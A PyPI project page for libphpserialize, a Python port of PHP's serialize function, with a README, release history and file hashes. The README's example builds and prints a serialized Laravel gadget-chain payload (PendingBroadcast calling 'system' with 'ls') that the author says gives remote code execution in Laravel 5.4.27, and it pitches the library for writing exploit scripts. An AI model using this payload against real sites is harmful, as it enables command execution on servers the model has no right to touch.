A port of PHP's serialize function, in pure python

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Project description

libphpserialize

A port of PHP's serialize function, in pure python

Features

  • serialize objects directly from python objects
  • nested objects
  • namespacing
  • variable Access Modifiers (public, private, protected)

Example

from phpserialize import serialize
from phpserialize.decorators import namespace
import requests


@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}


@namespace('Illuminate\Broadcasting')
class PendingBroadcast:
    protected_event = 'ls'
    protected_events = Generator()


print(serialize(PendingBroadcast()))

with above code, you'll get:

O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:15:"Faker\Generator":1:{s:13:"*formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"*event";s:2:"ls";}

which triggers an RCE vulnerability in Laravel 5.4.27

nice when you're writing an exploit script for others to read

Important:

  • the code is written and tested under python 3.7+
  • decimal serialization doesn't work the same as PHP does, yet

TODO

  • recursive objects support
  • reimplement decimal precision calculating algorithm from php engine

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for frankli0324 from gravatar.com frankli0324

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • License: MIT License
  • Author: Frank
  • Requires: Python >=3.7
Classifiers

Release history Release notifications | RSS feed

0.0.8

0.0.7

0.0.6

0.0.5

0.0.4

0.0.3

0.0.2

0.0.1

0.0.1b5 pre-release

0.0.1b4 pre-release

This version

0.0.1b3 pre-release

0.0.1b2 pre-release

0.0.1b0 pre-release

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

libphpserialize-0.0.1b3.tar.gz (3.8 kB view details)

Uploaded Source

Built Distribution

libphpserialize-0.0.1b3-py3-none-any.whl (4.6 kB view details)

Uploaded Python 3

File details

Details for the file libphpserialize-0.0.1b3.tar.gz.

File metadata

  • Download URL: libphpserialize-0.0.1b3.tar.gz
  • Upload date:
  • Size: 3.8 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.3.0 pkginfo/1.6.1 requests/2.25.1 setuptools/54.1.2 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.2

File hashes

Hashes for libphpserialize-0.0.1b3.tar.gz
Algorithm Hash digest
SHA256 76ceac1b7bb38478fc610c4a2e8240931b9a7e25fda25f9ad073266e1e95e41d
MD5 78abb4ef1ce053b7b58aab0dc1c42c6d
BLAKE2b-256 a4cfdd8d7b6325ede89faae98359704153f765d7db22dfcb479a0c2b2876a9db

See more details on using hashes here.

File details

Details for the file libphpserialize-0.0.1b3-py3-none-any.whl.

File metadata

  • Download URL: libphpserialize-0.0.1b3-py3-none-any.whl
  • Upload date:
  • Size: 4.6 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.3.0 pkginfo/1.6.1 requests/2.25.1 setuptools/54.1.2 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.2

File hashes

Hashes for libphpserialize-0.0.1b3-py3-none-any.whl
Algorithm Hash digest
SHA256 ca5174862c11500d125bbd503e020448044da67308e8a0e4726b6e4e9f3e8272
MD5 82f4e9794765309a333305b566e49a06
BLAKE2b-256 327e6b93dc63cca0f6b93c06e3d3db9d8cf3a08138e37e8a46aa24d24b26f3bf

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page